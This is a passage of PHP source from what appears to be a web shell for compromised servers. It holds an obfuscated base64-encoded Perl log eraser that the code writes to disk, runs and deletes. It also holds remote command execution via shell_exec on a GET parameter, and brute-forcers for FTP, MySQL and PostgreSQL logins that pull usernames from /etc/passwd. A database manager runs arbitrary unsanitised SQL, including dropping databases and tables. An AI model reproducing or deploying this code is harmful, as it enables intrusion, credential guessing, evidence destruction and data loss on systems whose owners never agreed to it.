3932 $erase = gzinflate(base64_decode("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"));
3933 if(is_writable("."))
3934 {
3935 if($openp = fopen(getcwd()."/logseraser.pl", 'w'))
3936 {
3937 fwrite($openp, $erase);
3938 fclose($openp);
3939 passthru("perl logseraser.pl linux");
3940 unlink("logseraser.pl");
3941 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
3942 }
3943 } else
3944 {
3945 if($openp = fopen("/tmp/logseraser.pl", 'w'))
3946 {
3947 fwrite($openp, $erase)or die("Error");
3948 fclose($openp);
3949 $aidx = passthru("perl logseraser.pl linux");
3950 unlink("logseraser.pl");
3951 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
3952 }
3953 }
3954 }
3955 else
3956 {
3957 $check = shell_exec($_GET['mycmd']);
3958 echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
3959 }
3960}
3961else if(isset($_GET['prototype']))
3962{
3963 echo '<h1>Results</h1><div><span>Type:</span> '.htmlspecialchars($_GET['prototype']).' <span><br>Server:</span> '.htmlspecialchars($_GET['serverport']).'<br>';
3964 if( $_GET['prototype'] == 'ftp' )
3965 {
3966 function BruteFun($ip,$port,$login,$pass)
3967 {
3968 $fp = @ftp_connect($ip, $port?$port:21);
3969 if(!$fp) return false;
3970 $res = @ftp_login($fp, $login, $pass);
3971 @ftp_close($fp);
3972 return $res;
3973 }
3974 }
3975 elseif( $_GET['prototype'] == 'mysql' )
3976 {
3977 function BruteFun($ip,$port,$login,$pass)
3978 {
3979 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
3980 @mysql_close($res);
3981 return $res;
3982 }
3983 }
3984 elseif( $_GET['prototype'] == 'pgsql' )
3985 {
3986 function BruteFun($ip,$port,$login,$pass)
3987 {
3988 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
3989 $res = @pg_connect($str);
3990 @pg_close($res);
3991 return $res;
3992 }
3993 }
3994
3995 $success = 0;
3996 $attempts = 0;
3997 $server = explode(":", $_GET['server']);
3998 if($_GET['type'] == 1)
3999 {
4000 $temp = @file('/etc/passwd');
4001 if( is_array($temp))
4002 foreach($temp as $line)
4003 {
4004 $line = explode(":", $line);
4005 ++$attempts;
4006 if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) )
4007 {
4008 $success++;
4009 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
4010 }
4011 if(@$_GET['reverse'])
4012 {
4013 $tmp = "";
4014 for($i=strlen($line[0])-1; $i>=0; --$i)
4015 $tmp .= $line[0][$i];
4016 ++$attempts;
4017 if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) )
4018 {
4019 $success++;
4020 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
4021 }
4022 }
4023 }
4024 }
4025 elseif($_GET['type'] == 2)
4026 {
4027 $temp = @file($_GET['dict']);
4028 if( is_array($temp) )
4029 foreach($temp as $line)
4030 {
4031 $line = trim($line);
4032 ++$attempts;
4033 if(BruteFun($server[0],@$server[1], $_GET['login'], $line) )
4034 {
4035 $success++;
4036 echo '<b>'.htmlspecialchars($_GET['login']).'</b>:'.htmlspecialchars($line).'<br>';
4037 }
4038 }
4039 }
4040 echo "<span>Attempts:</span> <font class=txt>$attempts</font> <span>Success:</span> <font class=txt>$success</font></div>";
4041}
4042// Execute Query
4043else if(isset($_GET["executeit"]))
4044{
4045 if(isset($_GET['username']) && isset($_GET['server']))
4046 {
4047 $dbserver = $_GET['server'];
4048 $dbuser = $_GET['username'];
4049 $dbpass = $_GET['password'];
4050 if(mysql_connect($dbserver,$dbuser,$dbpass))
4051 {
4052 setcookie("dbserver", $dbserver);
4053 setcookie("dbuser", $dbuser);
4054 setcookie("dbpass", $dbpass);
4055
4056 listdatabase();
4057 }
4058 else
4059 echo "cannotconnect";
4060 }
4061}
4062else if(isset($_GET['action']) && isset($_GET['dbname']))
4063
4064
4065 {
4066 if($_GET['action'] == "createDB")
4067 {
4068 $dbname = $_GET['dbname'];
4069 $dbserver = $_COOKIE["dbserver"];
4070 $dbuser = $_COOKIE["dbuser"];
4071 $dbpass = $_COOKIE["dbpass"];
4072 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
4073 mysql_query("create database $dbname",$mysqlHandle);
4074 listdatabase();
4075 }
4076 if($_GET['action'] == 'dropDB')
4077 {
4078 $dbname = $_GET['dbname'];
4079 $dbserver = $_COOKIE["dbserver"];
4080 $dbuser = $_COOKIE["dbuser"];
4081 $dbpass = $_COOKIE["dbpass"];
4082 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
4083 mysql_query("drop database $dbname",$mysqlHandle);
4084 mysql_close($mysqlHandle);
4085 listdatabase();
4086 }
4087
4088 if($_GET['action'] == 'listTables')
4089 {
4090 listtable();
4091 }
4092
4093 // Create Tables
4094 if($_GET['action'] == "createtable")
4095 {
4096 $dbserver = $_COOKIE["dbserver"];
4097 $dbuser = $_COOKIE["dbuser"];
4098 $dbpass = $_COOKIE["dbpass"];
4099 $dbname = $_GET['dbname'];
4100 $tablename = $_GET['tablename'];
4101 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4102 mysql_select_db($dbname);
4103 mysql_query("CREATE TABLE $tablename ( no INT )");
4104 listtable();
4105 }
4106
4107 // Drop Tables
4108 if($_GET['action'] == "dropTable")
4109 {
4110 $dbserver = $_COOKIE["dbserver"];
4111 $dbuser = $_COOKIE["dbuser"];
4112 $dbpass = $_COOKIE["dbpass"];
4113 $dbname = $_GET['dbname'];
4114 $tablename = $_GET['tablename'];
4115 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4116 mysql_select_db($dbname);
4117 mysql_query("drop table $tablename");
4118 listtable();
4119 }
4120
4121 // Empty Tables
4122 if($_GET['action'] == "empty")
4123 {
4124 $dbserver = $_COOKIE["dbserver"];
4125 $dbuser = $_COOKIE["dbuser"];
4126 $dbpass = $_COOKIE["dbpass"];
4127 $dbname = $_GET['dbname'];
4128 $tablename = $_GET['tablename'];
4129 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4130 mysql_select_db($dbname);
4131 mysql_query("delete from $tablename");
4132 listtable();
4133 }
4134
4135 // Empty Tables
4136 if($_GET['action'] == "dropField")
4137 {
4138 $dbserver = $_COOKIE["dbserver"];
4139 $dbuser = $_COOKIE["dbuser"];
4140 $dbpass = $_COOKIE["dbpass"];
4141 $dbname = $_GET['dbname'];
4142 $tablename = $_GET['tablename'];
4143 $fieldname = $_GET['fieldname'];
4144 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4145 mysql_select_db($dbname);
4146 $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
4147 mysql_select_db( $dbname, $mysqlHandle );
4148 mysql_query( $queryStr , $mysqlHandle );
4149 listtable();
4150 }
4151
4152 if($_GET['action'] == 'viewdb')
4153 {
4154 listdatabase();
4155 }
4156
4157 // View Table Schema
4158 if($_GET['action'] == "viewSchema")
4159 {
4160 $dbserver = $_COOKIE["dbserver"];
4161 $dbuser = $_COOKIE["dbuser"];
4162 $dbpass = $_COOKIE["dbpass"];
4163 $dbname = $_GET['dbname'];
4164 $tablename = $_GET['tablename'];
4165 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4166 mysql_select_db($dbname);
4167 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4168 $pResult = mysql_query( "SHOW fields FROM $tablename" );
4169 $num = mysql_num_rows( $pResult );
4170 echo "<br><br><table align=center cellspacing=4 style='width:80%;' border=1>";
4171 echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
4172 for( $i = 0; $i < $num; $i++ )
4173 {
4174 $field = mysql_fetch_array( $pResult );
4175 echo "<tr>\n";
4176 echo "<td>".$field["Field"]."</td>\n";
4177 echo "<td>".$field["Type"]."</td>\n";
4178 echo "<td>".$field["Null"]."</td>\n";
4179 echo "<td>".$field["Key"]."</td>\n";
4180 echo "<td>".$field["Default"]."</td>\n";
4181 echo "<td>".$field["Extra"]."</td>\n";
4182 $fieldname = $field["Field"];
4183 echo "<td><a href=# onClick=\"viewtables('dropField','$dbname','$tablename','','','','$fieldname')\">Drop</a></td>\n";
4184 echo "</tr>\n";
4185 }
4186 echo "</table>";
4187 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4188 }
4189
4190 // Execute Query
4191 if($_GET['action'] == "executequery")
4192 {
4193 $dbserver = $_COOKIE["dbserver"];
4194 $dbuser = $_COOKIE["dbuser"];
4195 $dbpass = $_COOKIE["dbpass"];
4196 $dbname = $_GET['dbname'];
4197 $tablename = $_GET['tablename'];
4198 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4199 mysql_select_db($dbname);
4200 $result = mysql_query($_GET['executemyquery']);
4201
4202 // results
4203 echo "<html>\r\n". strtoupper($_GET['executemyquery']) . "<br>\r\n<table border =\"1\">\r\n";
4204
4205 $count = 0;
4206 while ($row = mysql_fetch_assoc($result))
4207 {
4208 echo "<tr>\r\n";
4209
4210 if ($count==0) // list column names
4211 {
4212 echo "<tr>\r\n";
4213 while($key = key($row))
4214 {
4215 echo "<td><b>" . $key . "</b></td>\r\n";
4216 next($row);
4217 }
4218 echo "</tr>\r\n";
4219 }
4220
4221 foreach($row as $r) // list content of column names
4222 {
4223 if ($r=='') $r = '<font >NULL</font>';
4224 echo "<td><font class=txt>" . $r . "</font></td>\r\n";
4225 }
4226 echo "</tr>\r\n";
4227 $count++;
4228 }
4229 echo "</table>\n\r<font class=txt size=3>" . $count . " rows returned.</font>\r\n</html>";
4230 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4231 }
4232
4233 // View Table Data
4234 if($_GET['action'] == "viewdata")
4235 {
4236 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
4237 $dbserver = $_COOKIE["dbserver"];
4238 $dbuser = $_COOKIE["dbuser"];
4239 $dbpass = $_COOKIE["dbpass"];
4240 $dbname = $_GET['dbname'];
4241 $tablename = $_GET['tablename'];
4242 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4243 ?>
4244 <br><br>
4245 <form>
4246 <table>
4247 <tr>
4248 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
4249 </tr>
4250 <tr>
4251 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
4252 </tr>
4253 </table>
4254 </form>
4255 <?php
4256 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4257 mysql_select_db($dbname);
4258
4259 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4260 $row = mysql_fetch_array($sql);
4261 $rowid = $row['COLUMN_NAME'];
4262
4263 echo "<br><font size=4 color =lime>Data in Table</font><br>";
4264 if( $tablename != "" )
4265 echo "<font size=3 class=txt>$dbname > $tablename</font><br>";
4266 else
4267 echo "<font size=3 class=txt>$dbname</font><br>";
4268
4269 $queryStr = "";
4270 $pag = 0;
4271 $queryStr = stripslashes( $queryStr );
4272 if( $queryStr == "" )
4273 {
4274 if(isset($_REQUEST['page']))
4275 {
4276 $res = mysql_query("select * from $tablename");
4277 $getres = mysql_num_rows($res);
4278 $coun = ceil($getres/30);
4279 if($_REQUEST['page'] != 1)
4280
4281 $pag = $_REQUEST['page'] * 30;
4282 else
4283 $pag = $_REQUEST['page'] * 30;
4284
4285 $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
4286 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
4287 $arrcount = 1;
4288 $arrdata[$arrcount] = 0;
4289 while($row = mysql_fetch_array($sql))
4290 {
4291 $arrdata[$arrcount] = $row[$rowid];
4292 $arrcount++;
4293 }
4294 }
4295 else
4296 {
4297 $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
4298 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
4299 $arrcount = 1;
4300 $arrdata[$arrcount] = 0;
4301 while($row = mysql_fetch_array($sql))
4302 {
4303 $arrdata[$arrcount] = $row[$rowid];
4304 $arrcount++;
4305 }
4306 }
4307 if( $orderby != "" )
4308 $queryStr .= " ORDER BY $orderby";
4309 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\"><font size=3>Schema</font></a>\n";
4310 }
4311
4312
4313 $pResult = mysql_query($queryStr );
4314 $fieldt = mysql_fetch_field($pResult);
4315 $tablename = $fieldt->table;
4316 $errMsg = mysql_error();
4317
4318 $GLOBALS[queryStr] = $queryStr;
4319
4320 if( $pResult == false )
4321 {
4322 echoQueryResult();
4323 return;
4324 }
4325 if( $pResult == 1 )
4326 {
4327 $errMsg = "Success";
4328 echoQueryResult();
4329 return;
4330 }
4331
4332 echo "<hr color='#1B1B1B'>\n";
4333
4334 $row = mysql_num_rows( $pResult );
4335 $col = mysql_num_fields( $pResult );
4336
4337 if( $row == 0 )
4338 {
4339 echo "<font size=3>No Data Exist!</font>";
4340 return;
4341 }
4342
4343 if( $rowperpage == "" ) $rowperpage = 30;
4344 if( $page == "" ) $page = 0;
4345 else $page--;
4346 mysql_data_seek( $pResult, $page * $rowperpage );
4347
4348 echo "<table cellspacing=1 cellpadding=5 border=1 align=center>\n";
4349 echo "<tr>\n";
4350 for( $i = 0; $i < $col; $i++ )
4351 {
4352 $field = mysql_fetch_field( $pResult, $i );
4353 echo "<th>";
4354 if($action == "viewdata")
4355 echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
4356 else
4357 echo $field->name."\n";
4358 echo "</th>\n";
4359 }
4360 echo "<th colspan=2>Action</th>\n";
4361 echo "</tr>\n";
4362 $num=1;
4363
4364
4365 $acount = 1;
4366
4367 for( $i = 0; $i < $rowperpage; $i++ )
4368 {
4369 $rowArray = mysql_fetch_row( $pResult );
4370 if( $rowArray == false ) break;
4371 echo "<tr>\n";
4372 $key = "";
4373 for( $j = 0; $j < $col; $j++ )
4374 {
4375 $data = $rowArray[$j];
4376
4377 $field = mysql_fetch_field( $pResult, $j );
4378 if( $field->primary_key == 1 )
4379 $key .= "&" . $field->name . "=" . $data;
4380
4381 if( strlen( $data ) > 30 )
4382 $data = substr( $data, 0, 30 ) . "...";
4383 $data = htmlspecialchars( $data );
4384 echo "<td>\n";
4385 echo "<font class=txt>$data</font>\n";
4386 echo "</td>\n";
4387 }
4388
4389 if(!is_numeric($arrdata[$acount]))
4390 echo "<td colspan=2>No Key</td>\n";
4391 else
4392 {
4393 echo "<td><a href=# onClick=\"viewtables('editData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Edit</a></td>\n";
4394 echo "<td><a href=# onClick=\"viewtables('deleteData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Delete</a></td>\n";
4395 $acount++;
4396 }
4397 }
4398 echo "</tr>\n";
4399
4400
4401 echo "</table>";
4402 if($arrcount > 30)
4403 {
4404 $res = mysql_query("select * from $tablename");
4405 $getres = mysql_num_rows($res);
4406 $coun = ceil($getres/30);
4407 echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
4408 for($i=0;$i<$coun;$i++)
4409 echo "<option value=$i>$i</option>";
4410
4411 echo "</select> <input type=button onClick=\"viewtables('viewdata','$dbname','$tablename','','','','',page.value)\" value=Go class=but></form>";
4412 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4413 }
4414 }
4415
4416 // Delete Table Data
4417 if($_GET['action'] == "deleteData")
4418 {
4419 $dbserver = $_COOKIE["dbserver"];
4420 $dbuser = $_COOKIE["dbuser"];
4421 $dbpass = $_COOKIE["dbpass"];
4422 $dbname = $_GET['dbname'];
4423 $tablename = $_GET['tablename'];
4424 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4425 mysql_select_db($dbname);
4426 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4427 $row = mysql_fetch_array($sql);
4428 $row = $row['COLUMN_NAME'];
4429 $rowid = $_GET[$row];
4430 mysql_query("delete from $tablename where $row = '$rowid'");
4431 listtable();
4432 }
4433 // Edit Table Data
4434 if($_GET['action'] == "editData")
4435 {
4436 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
4437 $dbserver = $_COOKIE["dbserver"];
4438 $dbuser = $_COOKIE["dbuser"];
4439 $dbpass = $_COOKIE["dbpass"];
4440 $dbname = $_GET['dbname'];
4441 $tablename = $_GET['tablename'];
4442 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4443 ?>
4444 <br><br>
4445 <form action="<?php echo $self; ?>" method="post">
4446 <?php
4447 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4448 mysql_select_db($dbname);
4449
4450 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4451 $row = mysql_fetch_array($sql);
4452 $row = $row['COLUMN_NAME'];
4453 $rowid = $_GET[$row];
4454
4455 $pResult = mysql_list_fields( $dbname, $tablename );
4456 $num = mysql_num_fields( $pResult );
4457
4458 $key = "";
4459 for( $i = 0; $i < $num; $i++ )
4460 {
4461 $field = mysql_fetch_field( $pResult, $i );
4462 if( $field->primary_key == 1 )
4463 if( $field->numeric == 1 )
4464 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
4465 else
4466 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
4467 }
4468 $key = substr( $key, 0, strlen($key)-4 );
4469
4470 mysql_select_db( $dbname, $mysqlHandle );
4471 $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle );
4472 $data = mysql_fetch_array( $pResult );
4473
4474 echo "<table cellspacing=1 cellpadding=2 border=1>\n";
4475 echo "<tr>\n";
4476 echo "<th>Name</th>\n";
4477 echo "<th>Type</th>\n";
4478 echo "<th>Function</th>\n";
4479 echo "<th>Data</th>\n";
4480 echo "</tr>\n";
4481
4482 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4483 $num = mysql_num_rows( $pResult );
4484
4485 $pResultLen = mysql_list_fields( $dbname, $tablename );
4486 $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',";
4487 $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',";
4488 for( $i = 0; $i < $num; $i++ )
4489 {
4490 $field = mysql_fetch_array( $pResult );
4491 $fieldname = $field["Field"];
4492 $fieldtype = $field["Type"];
4493 $len = mysql_field_len( $pResultLen, $i );
4494
4495 echo "<tr>";
4496 echo "<td>$fieldname</td>";
4497 echo "<td>".$field["Type"]."</td>";
4498 echo "<td>\n";
4499 echo "<select name=${fieldname}_function class=sbox>\n";
4500 echo "<option>\n";
4501 echo "<option>ASCII\n";
4502 echo "<option>CHAR\n";
4503 echo "<option>SOUNDEX\n";
4504 echo "<option>CURDATE\n";
4505 echo "<option>CURTIME\n";
4506 echo "<option>FROM_DAYS\n";
4507 echo "<option>FROM_UNIXTIME\n";
4508 echo "<option>NOW\n";
4509 echo "<option>PASSWORD\n";
4510 echo "<option>PERIOD_ADD\n";
4511 echo "<option>PERIOD_DIFF\n";
4512 echo "<option>TO_DAYS\n";
4513 echo "<option>USER\n";
4514 echo "<option>WEEKDAY\n";
4515 echo "<option>RAND\n";
4516 echo "</select>\n";
4517 echo "</td>\n";
4518 $value = htmlspecialchars($data[$i]);
4519 $type = strtok( $fieldtype, " (,)\n" );
4520 if( $type == "enum" || $type == "set" )
4521 {
4522 echo "<td>\n";
4523 if( $type == "enum" )
4524 echo "<select name=$fieldname class=box>\n";
4525 else if( $type == "set" )
4526 echo "<select name=$fieldname size=4 class=box multiple>\n";
4527 while( $str = strtok( "'" ) )
4528 {
4529 if( $value == $str )
4530 echo "<option selected>$str\n";
4531 else
4532 echo "<option>$str\n";
4533 strtok( "'" );
4534 }
4535 echo "</select>\n";
4536 echo "</td>\n";
4537 }
4538 else
4539 {
4540 if( $len < 40 )
4541 echo "<td><input type=text size=40 maxlength=$len id=dhanush_$fieldname name=sql_$fieldname value=\"$value\" class=box></td>\n";
4542 else
4543 echo "<td><textarea cols=47 rows=3 maxlength=$len name=dhanush_$fieldname class=box>$value</textarea>\n";
4544 }
4545 $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
4546 $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
4547 echo "</tr>";
4548 }
4549 $fundata1=eregi_replace(',$', '', $fundata1);
4550 $fundata2=eregi_replace(',$', '', $fundata2);
4551
4552 echo "</table><p>\n";
4553 echo "<input type=button onClick=\"editdata($fundata1)\" value='Edit Data' class=but>\n";
4554 echo "<input type=button value='Insert' onClick=\"editdata($fundata2)\" class=but>\n";
4555 echo "</form>\n";
4556 }
4557 }
4558// Edit Submit Table Data
4559else if($_REQUEST['action'] == "editsubmitData")
4560{
4561 $dbserver = $_COOKIE["dbserver"];
4562 $dbuser = $_COOKIE["dbuser"];
4563 $dbpass = $_COOKIE["dbpass"];
4564 $dbname = $_POST['dbname'];
4565 $tablename = $_POST['tablename'];
4566
4567 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4568 mysql_select_db($dbname);
4569
4570 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4571 $row = mysql_fetch_array($sql);
4572 $row = $row['COLUMN_NAME'];
4573 $rowid = $_POST[$row];
4574
4575 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4576 $num = mysql_num_rows( $pResult );
4577
4578 $rowcount = $num;
4579
4580 $pResultLen = mysql_list_fields( $dbname, $tablename );
4581
4582 for( $i = 0; $i < $num; $i++ )
4583 {
4584 $field = mysql_fetch_array( $pResult );
4585 $fieldname = $field["Field"];
4586 $arrdata = $_REQUEST[$fieldname];
4587
4588 $str .= " " . $fieldname . " = '" . $arrdata . "'";
4589 $rowcount--;
4590 if($rowcount != 0)
4591 $str .= ",";
4592 }
4593
4594 $str = "update $tablename set" . $str . " where $row=$rowid";
4595 mysql_query($str);
4596 ?><div id="showsql"></div><?php
4597}
4598// Insert Table Data
4599else if($_REQUEST['action'] == "insertdata")
4600{
4601 $dbserver = $_COOKIE["dbserver"];
4602 $dbuser = $_COOKIE["dbuser"];
4603 $dbpass = $_COOKIE["dbpass"];
4604 $dbname = $_POST['dbname'];
4605 $tablename = $_POST['tablename'];
4606
4607 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4608 mysql_select_db($dbname);
4609
4610 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4611 $row = mysql_fetch_array($sql);
4612 $row = $row['COLUMN_NAME'];
4613 $rowid = $_POST[$row];
4614
